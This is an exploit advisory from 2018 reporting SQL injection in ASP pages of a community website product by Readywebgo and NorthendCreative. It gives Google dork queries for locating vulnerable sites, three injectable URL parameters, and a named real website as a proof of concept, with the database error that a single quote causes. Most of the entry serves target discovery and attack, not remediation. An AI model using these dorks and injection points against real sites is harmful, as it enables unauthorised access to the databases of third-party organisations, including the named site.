#################################################################################################
# Exploit Title : Basque Community by Readywebgo and NorthendCreative SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 29/05/2018
# Vendor Homepages : readywebgo.com / northendcreative.com/rwglanding
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Exploit Title : Website is a service to the Basque Community by Readywebgo and NorthendCreative SQL Injection Vulnerability
# Google Dork : inurl:''/content.asp?id=''
# Google Dork 2 : inurl:''/gallery.asp?gall='' site:org
# Google Dork 3 : intext:''Logo created by Izar Iribarren-Gorrindo Bicandi arbola website is a service to the Basque community by Readywebgo''
# Exploit : /content.asp?id=[SQL Injection]
# Exploit : /gallery.asp?gall=[SQL Injection]
# Exploit : /news.asp?id=[SQL Injection]
# Example Site => cenarrusa.org/content.asp?id=3%27 [ Proof of Concept for SQL Injection ] => archive.is/YJJmO
# Error : Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'articles.id = 3''.
/content.asp, line 17
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################